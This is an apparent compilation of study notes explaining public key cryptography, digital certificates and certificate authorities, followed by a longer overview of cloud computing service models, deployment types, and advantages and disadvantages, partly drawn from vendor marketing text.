When RSA is used, the process of validating the digital signature is faster than creating it.

Public Key Cryptography


Public Key cryptography is based on asymmetric encryption. Asymmetric encryption makes use of a
mathematically linked pair of keys, one is known as the public and the other is known as the private key. The
plaintext encrypted using one of the keys can only be decrypted using the other key, and it is impossible to
compute private key, if public key is published. A user has his own pair of keys, keeping the private key
absolutely private and the public key as public as possible.

The following text explains the concept more clearly. If Alice has in hand her own public key (PubA), her
own private key (PrivA), and Bob's public key (PubB), she can do the following:

• Encrypt the plaintext with Bob's public key (PubB)


• Calculate the hash sum of the plaintext and encrypt it with her own private key (PrivA)

• Combine the ciphertext and the encrypted hash sum in a message and send it to Bob.

Upon receiving this message, Bob, who should have in his possession his own public key (PubB), his own
private key (PrivB), and Alice's public key (PubA), can do the following:

• Decrypt the ciphertext with his own private key (PrivB)

• Decrypt the hash sum with Alice's public key (PubA)

• Calculate the hash sum of the plaintext and compare it with the decrypted hash sum

Bob can now decrypt the ciphertext to plaintext and, if the hash sums are the same he can make sure that it
hasn't been altered in network.

What is a Digital Certificate?


The data structure used to transport and validate keys is called a digital certificate. A certificate
protects the key by guaranteeing the identity of the issuer, the identity of the owner, and the
purposes for which the key can be used. A certificate cannot be forged because the issuing
authority digitally signs it. The signature is applied to a hash of the certificate. This enables
clients to validate the issuer's identity and find any alteration. The client decrypts the hash using
the issuer's public key and then compares the result to a separate hash it performs on the
certificate. If the results match, the certificate is valid.
A Digital Certificate contains the following fields (some are optional).

Issued By: The Certification Authority (CA) that issued the digital certificate.

Issued To: The recipient that obtained the digital certificate. If the recipient is a user, the name
can be the user's logon ID, User Principal Name (UPN), or Distinguished Name (DN).

Intended Uses (OID): A certificate has one or more uses. This shows the intended uses of the
certificate.

Version: The certificate version. Windows Certification Authority (CA) servers issue X.509
Version 3 certificates.

Serial Number: This is a sequential number assigned by the CA to the certificate. The number is
unique and acts as a validity check.
Signature Algorithm: The hashing algorithm used to do the digital signature for the certificate.
This is typically either SHA-1 or MD5.

Issuer: This is the X.500 distinguished name of the issuing server.

Valid From: This is the issue date of the certificate.

Valid To: This important field defines the expiry date of the certificate.

Subject: This is the X.500 distinguished name of the certificate's owner.

Public Key: This field contains the public key.

CA Version: This field contains the version number (number of times the authorization
certificate for a particular Certification Authority (CA) has been renewed).

Subject Key Identifier: This field contains an SHA-1 hash of the Public Key field used to
uniquely identify the contents. This prevents alteration of the public key.

Certificate Template: This field is a Microsoft extension that contains name of the template used
by the CA to generate this certificate.

Key Usage: This field contains the OIDs of the purposes for the certificate.

Authority Key Identifier: Contains an SHA-1 hash of the public key of the issuing CA along
with the distinguished name of the CA.

CRL Distribution Points (CDPs): CRL (Certificate Revocation List) information listed by LDAP
path, URL, and file share name.

Authority Information Access: Information for a client to find the certificate of the issuing CA.

Thumbprint: A hash of the certificate.

Thumbprint Algorithm: The algorithm used to obtain the certificate hash.

What is Public Key Infrastructure PKI, Confidentiality,


Authentication, Integrity, non-repudiation
The Public Key Infrastructure (PKI) is a set of hardware, software, people, policies, and procedures
needed to create, manage, store, distribute, and revoke Digital Certificates. A Public Key
Infrastructure (PKI) enables users of a basically unsecure public network such as the Internet to
securely and privately exchange data through the use of a public and a private cryptographic key
pair that is obtained and shared through a trusted authority.

The following are the major functions of Public Key Infrastructure (PKI).

Confidentiality: The privacy of user transactions is protected by encrypting data streams and
messages. The confidentiality function may be intended to prevent the unauthorized disclosure of
information locally or across a network. By using Public Key Infrastructure (PKI), users are able
to ensure that only an intended recipient can “unlock” (decrypt) an encrypted message.

Authentication: Authentication is the process of verifying that the user is who they say they are.
PKI provides a means for senders and recipients to validate each other's identities.

Integrity: Guaranteeing message integrity is another important function of Public Key


Infrastructure (PKI). Public Key Infrastructure (PKI) has built-in ways to validate that all the
outputs are equivalent to the inputs. Any alter of the data can be immediately detected and
prevented.

Non-Repudiation: Public Key Infrastructure (PKI) ensures that an author cannot refute that they
signed or encrypted a particular message once it has been sent, assuming the private key is secured.
Here Digital signatures link senders to their messages. Only the sender of the message could sign
messages with their private key and therefore, all messages signed with the sender's private key
originated with that specific individual.

What is a Certificate Authority (CA) and functions of a


Certificate Authority (CA)

Certificate Authority (CA) is a trusted entity that issues Digital Certificates and public-private
key pairs. The role of the Certificate Authority (CA) is to guarantee that the individual granted
the unique certificate is, in fact, who he or she claims to be.

The Certificate Authority (CA) verifies that the owner of the certificate is who he says he is. A
Certificate Authority (CA) can be a trusted third party which is responsible for physically
verifying the legitimacy of the identity of an individual or organization before issuing a digital
certificate.

A Certificate Authority (CA) can be an external (public) Certificate Authority (CA) like verisign,
thawte or comodo, or an internal (private) Certificate Authority (CA) configured inside our
network.
Certificate Authority (CA) is a critical security service in a network. A Certificate Authority
(CA) performs the following functions.

Certificate Authority (CA) Verifies the identity: The Certificate Authority (CA) must validate
the identity of the entity who requested a digital certificate before issuing it.

Certificate Authority (CA) issues digital certificates: Once the validation process is over, the
Certificate Authority (CA) issues the digital certificate to the entity who requested it. Digital
certificates can be used for encryption (Example: Encrypting web traffic), code signing,
authentication etc.

Certificate Authority (CA) maintains Certificate Revocation List (CRL): The Certificate
Authority (CA) maintains Certificate Revocation List (CRL). A certificate revocation list (CRL)
is a list of digital certificates which are no longer valid and have been revoked and therefore
should not be relied by anyone.

What Is Cloud Computing?


What is the cloud? Where is the cloud? Are we in the cloud now? These are all questions you've
probably heard or even asked yourself. The term "cloud computing" is everywhere.
In the simplest terms, cloud computing means storing and accessing data and programs over the
Internet instead of your computer's hard drive. The cloud is just a metaphor for the Internet. It
goes back to the days of flowcharts and presentations that would represent the gigantic server-
farm infrastructure of the Internet as nothing but a puffy, white cumulus cloud, accepting
connections and doling out information as it floats.
What cloud computing is not about is your hard drive. When you store data on or run programs
from the hard drive, that's called local storage and computing. Everything you need is physically
close to you, which means accessing your data is fast and easy, for that one computer, or others
on the local network. Working off your hard drive is how the computer industry functioned for
decades; some would argue it's still superior to cloud computing, for reasons I'll explain shortly.
The cloud is also not about having a dedicated network attached storage (NAS) hardware or
server in residence. Storing data on a home or office network does not count as utilizing the
cloud. (However, some NAS will let you remotely access things over the Internet, and there's at
least one brand from Western Digital named "My Cloud," just to keep things confusing.)
For it to be considered "cloud computing," you need to access your data or your programs over
the Internet, or at the very least, have that data synced with other information over the Web. In a
big business, you may know all there is to know about what's on the other side of the connection;
as an individual user, you may never have any idea what kind of massive data processing is
happening on the other end. The end result is the same: with an online connection, cloud
computing can be done anywhere, anytime.
Consumer vs. Business
Let's be clear here. We're talking about cloud computing as it impacts individual consumers—
those of us who sit back at home or in small-to-medium offices and use the Internet on a regular
basis.
There is an entirely different "cloud" when it comes to business. Some businesses choose to
implement
• Software-as-a-Service (SaaS), where the business subscribes to an application it
accesses over the Internet. (Think Salesforce.com.)
• There's also Platform-as-a-Service (PaaS), where a business can create its own custom
applications for use by all in the company.
• And don't forget the mighty Infrastructure-as-a-Service (IaaS), where players like
Amazon, Microsoft, Google, and Rackspace provide a backbone that can be "rented out"
by other companies. (For example, Netflix provides services to you because it's a
customer of the cloud services at Amazon.)
Of course, cloud computing is big business: The market generated $100 billion a year in 2012,
which could be $127 billion by 2017 and $500 billion by 2020.

Simply put, cloud computing is the delivery of computing services—servers, storage, databases,
networking, software, analytics, and more—over the Internet (“the cloud”). Companies offering
these computing services are called cloud providers and typically charge for cloud computing
services based on usage, similar to how you’re billed for water or electricity at home.
Uses of cloud computing
You’re probably using cloud computing right now, even if you don’t realize it. If you use an
online service to send email, edit documents, watch movies or TV, listen to music, play games,
or store pictures and other files, it’s likely that cloud computing is making it all possible behind
the scenes. The first cloud computing services are barely a decade old, but already a variety of
organizations—from tiny startups to global corporations, government agencies to non-profits—
are embracing the technology for all sorts of reasons. Here are a few of the things you can do
with the cloud:

• Create new apps and services


• Store, back up, and recover data
• Host websites and blogs
• Stream audio and video
• Deliver software on demand
• Analyze data for patterns and make predictions

Top benefits of cloud computing


Cloud computing is a big shift from the traditional way businesses think about IT resources. What is
it about cloud computing? Why is cloud computing so popular? Here are 6 common reasons
organizations are turning to cloud computing services:
1. Cost
Cloud computing eliminates the capital expense of buying hardware and software and setting up and
running on-site datacenters—the racks of servers, the round-the-clock electricity for power and
cooling, the IT experts for managing the infrastructure. It adds up fast.

2. Speed
Most cloud computing services are provided self service and on demand, so even vast amounts of
computing resources can be provisioned in minutes, typically with just a few mouse clicks, giving
businesses a lot of flexibility and taking the pressure off capacity planning.

3. Global scale
The benefits of cloud computing services include the ability to scale elastically. In cloud speak, that
means delivering the right amount of IT resources—for example, more or less computing power,
storage, bandwidth—right when its needed, and from the right geographic location.

4. Productivity
On-site datacenters typically require a lot of “racking and stacking”—hardware set up, software
patching, and other time-consuming IT management chores. Cloud computing removes the need for
many of these tasks, so IT teams can spend time on achieving more important business goals.

5. Performance
The biggest cloud computing services run on a worldwide network of secure datacenters, which are
regularly upgraded to the latest generation of fast and efficient computing hardware. This offers
several benefits over a single corporate datacenter, including reduced network latency for
applications and greater economies of scale.

6. Reliability
Cloud computing makes data backup, disaster recovery, and business continuity easier and less
expensive, because data can be mirrored at multiple redundant sites on the cloud provider’s network.

Types of cloud services: IaaS, PaaS, SaaS


Most cloud computing services fall into three broad categories: infrastructure as a service (IaaS),
platform as a service (PaaS), and software as a service (Saas). These are sometimes called the cloud
computing stack, because they build on top of one another. Knowing what they are and how they’re
different makes it easier to accomplish your business goals.
Infrastructure-as-a-service (IaaS)
The most basic category of cloud computing services. With IaaS, you rent IT infrastructure—servers
and virtual machines (VMs), storage, networks, operating systems—from a cloud provider on a pay-
as-you-go basis. To learn more, see What is IaaS?
Platform as a service (PaaS)
Platform-as-a-service (PaaS) refers to cloud computing services that supply an on-demand
environment for developing, testing, delivering, and managing software applications. PaaS is
designed to make it easier for developers to quickly create web or mobile apps, without worrying
about setting up or managing the underlying infrastructure of servers, storage, network, and
databases needed for development. To learn more, see What is PaaS?
Software as a service (SaaS)
Software-as-a-service (SaaS) is a method for delivering software applications over the Internet, on
demand and typically on a subscription basis. With SaaS, cloud providers host and manage the
software application and underlying infrastructure, and handle any maintenance, like software
upgrades and security patching. Users connect to the application over the Internet, usually with a
web browser on their phone, tablet, or PC. To learn more, see What is SaaS?

Types of cloud deployments: public, private, hybrid


Not all clouds are the same. There are three different ways to deploy cloud computing resources:
public cloud, private cloud, and hybrid cloud.

Public cloud
Public clouds are owned and operated by a third-party cloud service provider, which deliver their
computing resources like servers and storage over the Internet. Microsoft Azure is an example of a
public cloud. With a public cloud, all hardware, software, and other supporting infrastructure is
owned and managed by the cloud provider. You access these services and manage your account
using a web browser.

Private cloud
A private cloud refers to cloud computing resources used exclusively by a single business or
organization. A private cloud can be physically located on the company’s on-site datacenter. Some
companies also pay third-party service providers to host their private cloud. A private cloud is one in
which the services and infrastructure are maintained on a private network.

Hybrid cloud
Hybrid clouds combine public and private clouds, bound together by technology that allows data and
applications to be shared between them. By allowing data and applications to move between private
and public clouds, hybrid cloud gives businesses greater flexibility and more deployment options.
Cloud computing, often referred to as simply “the cloud,” is the delivery of on-demand computing
resources—everything from applications to data centers—over the internet on a pay-for-use basis.
• Elastic resources—Scale up or down quickly and easily to meet demand
• Metered service so you only pay for what you use
• Self-service—All the IT resources you need with self-service access

Software as a service (SaaS)


Cloud-based applications—or software as a service—run on distant computers “in the cloud” that
are owned and operated by others and that connect to users’ computers via the internet and, usually,
a web browser.
The benefits of SaaS
• You can sign up and rapidly start using innovative business apps
• Apps and data are accessible from any connected computer
• No data is lost if your computer breaks, as data is in the cloud
• The service is able to dynamically scale to usage needs
Explore IBM Cloud software as a service
With SaaS, you no longer have to purchase, install, update and maintain the software.

Platform as a service (PaaS)


Platform as a service provides a cloud-based environment with everything required to support the
complete lifecycle of building and delivering web-based (cloud) applications—without the cost and
complexity of buying and managing the underlying hardware, software, provisioning, and hosting.
The benefits of PaaS
• Develop applications and get to market faster
• Deploy new web applications to the cloud in minutes
• Reduce complexity with middleware as a service
IBM Cloud platform as a service
Deploy and migrate applications to both public and private clouds.

Infrastructure as a service (IaaS)


Infrastructure as a service provides companies with computing resources including servers,
networking, storage, and data center space on a pay-per-use basis.
The benefits of IaaS
• No need to invest in your own hardware
• Infrastructure scales on demand to support dynamic workloads
• Flexible, innovative services available on demand
IBM Cloud infrastructure as a service
Get up and running more quickly while cutting costs.

Public cloud
Public clouds are owned and operated by companies that offer rapid access over a public network to
affordable computing resources. With public cloud services, users don’t need to purchase hardware,
software, or supporting infrastructure, which is owned and managed by providers.
Key aspects of public cloud
• Innovative SaaS business apps for applications ranging from customer resource
management (CRM) to transaction management and data analytics
• Flexible, scalable IaaS for storage and compute services on a moment’s notice
• Powerful PaaS for cloud-based application development and deployment environments
IBM public cloud
Flexibility to access the resources you need, when you need them.

Private cloud
A private cloud is infrastructure operated solely for a single organization, whether managed
internally or by a third party, and hosted either internally or externally. Private clouds can take
advantage of cloud’s efficiencies, while providing more control of resources and steering clear of
multi-tenancy.
Key aspects of private cloud
• A self-service interface controls services, allowing IT staff to quickly provision, allocate,
and deliver on-demand IT resources
• Highly automated management of resource pools for everything from compute capability
to storage, analytics, and middleware
• Sophisticated security and governance designed for a company’s specific requirements
IBM infrastructure for private cloud
The additional level of security you want with the benefits of cloud.

Hybrid cloud
A hybrid cloud uses a private cloud foundation combined with the strategic integration and use of
public cloud services. The reality is a private cloud can’t exist in isolation from the rest of a
company’s IT resources and the public cloud. Most companies with private clouds will evolve to
manage workloads across data centers, private clouds, and public clouds—thereby creating hybrid
clouds.
Key aspects of hybrid cloud
• Allows companies to keep the critical applications and sensitive data in a traditional data
center environment or private cloud
• Enables taking advantage of public cloud resources like SaaS, for the latest applications,
and IaaS, for elastic virtual resources
• Facilitates portability of data, apps and services and more choices for deployment models
IBM hybrid cloud

Advantages of Cloud Computing


For start-up businesses the cloud offers an essential differentiator. For the first time, anyone with an
idea can start a business and get it up and running quickly on an enterprise-grade IT infrastructure
that’s flexible enough to accommodate growth, yet requires minimal up-front capital expenditure.
For small to medium sized businesses that have limited IT resources, the cloud allows you to focus
on running your business rather than your IT. You can take advantage of a wide portfolio of
compute, storage and network products, then cost effectively scale on-demand as your business
grows — often while delivering faster time to market than previously achievable.
Mid to large enterprises often face complex hosting needs, varying departmental and corporate-wide
infrastructure requirements, high traffic websites and demanding applications. For them, the cloud
can often drive down costs and deliver increased operational efficiency, productivity, agility and
flexibility.
Advantages of Cloud Computing at a Glance:
• Drive down costs: Avoid large capital expenditure on hardware and upgrades. Cloud can
also improve cost efficiency by more closely matching your cost pattern to your
revenue/demand pattern, moving your business from a capital-intensive cost model to an
Opex model.
• Cope with demand: You know what infrastructure you need today, but what about your
future requirements? As your business grows, a cloud environment should grow with
you. And when demand is unpredictable or you need to test a new application, you have
the ability spin capacity up or down, while paying only for what you use.
• Run your business; don’t worry about your IT: Monitoring your infrastructure 24/7 is
time consuming and expensive when you have a business to run. A managed cloud
solution means that your hosting provider is doing this for you. In addition to monitoring
your infrastructure and keeping your data safe, they can provide creative and practical
solutions to your needs, as well as expert advice to keep your IT infrastructure working
efficiently as your needs evolve.
• Innovate and lead: Ever-changing business requirements mean that your IT
infrastructure has to be flexible. With a cloud infrastructure, you can rapidly deploy new
projects and take them live quickly, keeping you at the vanguard of innovation in your
sector.
• Improved security and compliance: You have to protect your business against loss of
revenue and brand damage. In addition, many organizations face strict regulatory and
compliance obligations. A cloud environment means that this responsibility no longer
rests entirely on your shoulders. Your cloud hosting provider will build in resiliency and
agility at an infrastructure-level to limit the risk of a security breach, and will work with
you to help address compliance and regulatory requirements.
• Reduce your carbon footprint: Hosting in a data center rather than onsite allows you to
take advantage of the latest energy-efficient technology. Additionally, as cloud service
providers host multiple customers on shared infrastructure, they can drive higher and
more efficient utilization of energy resources.
• Future-proof your business: There is unprecedented demand for access to data
anywhere, any time and on any device. Don’t let your business fall behind. By embracing
the cloud, you can handle emerging mobile, BYOD and wearable technology trends.

Advantages and Disadvantages of Cloud Computing


There is no doubt that businesses can reap huge benefits from cloud computing. However, with
the many advantages, come some drawbacks as well. Take time to understand the advantages
and disadvantages of cloud computing, so that you can get the most out of your business
technology, whichever cloud provider you choose.
Advantages of Cloud Computing
Cost Savings
Perhaps, the most significant cloud computing benefit is in terms of IT cost savings. Businesses,
no matter what their type or size, exist to earn money while keeping capital and operational
expenses to a minimum. With cloud computing, you can save substantial capital costs with zero
in-house server storage and application requirements. The lack of on-premises infrastructure also
removes their associated operational costs in the form of power, air conditioning and
administration costs. You pay for what is used and disengage whenever you like - there is no
invested IT capital to worry about. It’s a common misconception that only large businesses can
afford to use the cloud, when in fact, cloud services are extremely affordable for smaller
businesses.
Reliability
With a managed service platform, cloud computing is much more reliable and consistent than in-
house IT infrastructure. Most providers offer a Service Level Agreement which guarantees
24/7/365 and 99.99% availability. Your organization can benefit from a massive pool of
redundant IT resources, as well as quick failover mechanism - if a server fails, hosted
applications and services can easily be transited to any of the available servers.

Manageability
Cloud computing provides enhanced and simplified IT management and maintenance
capabilities through central administration of resources, vendor managed infrastructure and SLA
backed agreements. IT infrastructure updates and maintenance are eliminated, as all resources
are maintained by the service provider. You enjoy a simple web-based user interface for
accessing software, applications and services – without the need for installation - and an SLA
ensures the timely and guaranteed delivery, management and maintenance of your IT services.

Strategic Edge
Ever-increasing computing resources give you a competitive edge over competitors, as the time
you require for IT procurement is virtually nil. Your company can deploy mission critical
applications that deliver significant business benefits, without any upfront costs and minimal
provisioning time. Cloud computing allows you to forget about technology and focus on your
key business activities and objectives. It can also help you to reduce the time needed to market
newer applications and services.

Disadvantages of Cloud Computing


Downtime
As cloud service providers take care of a number of clients each day, they can become
overwhelmed and may even come up against technical outages. This can lead to your business
processes being temporarily suspended. Additionally, if your internet connection is offline, you
will not be able to access any of your applications, server or data from the cloud.
Security
Although cloud service providers implement the best security standards and industry
certifications, storing data and important files on external service providers always opens up
risks. Using cloud-powered technologies means you need to provide your service provider with
access to important business data. Meanwhile, being a public service opens up cloud service
providers to security challenges on a routine basis. The ease in procuring and accessing cloud
services can also give nefarious users the ability to scan, identify and exploit loopholes and
vulnerabilities within a system. For instance, in a multi-tenant cloud architecture where multiple
users are hosted on the same server, a hacker might try to break into the data of other users
hosted and stored on the same server. However, such exploits and loopholes are not likely to
surface, and the likelihood of a compromise is not great.

Vendor Lock-In
Although cloud service providers promise that the cloud will be flexible to use and integrate,
switching cloud services is something that hasn’t yet completely evolved. Organizations may
find it difficult to migrate their services from one vendor to another. Hosting and integrating
current cloud applications on another platform may throw up interoperability and support issues.
For instance, applications developed on Microsoft Development Framework (.Net) might not
work properly on the Linux platform.

Limited Control
Since the cloud infrastructure is entirely owned, managed and monitored by the service provider,
it transfers minimal control over to the customer. The customer can only control and manage the
applications, data and services operated on top of that, not the backend infrastructure itself. Key
administrative tasks such as server shell access, updating and firmware management may not be
passed to the customer or end user.

It is easy to see how the advantages of cloud computing easily outweigh the drawbacks.
Decreased costs, reduced downtime, and less management effort are benefits that speak for
themselves

Freedom to have your apps, data and services where they are most effective and deliver value faster.

You might also like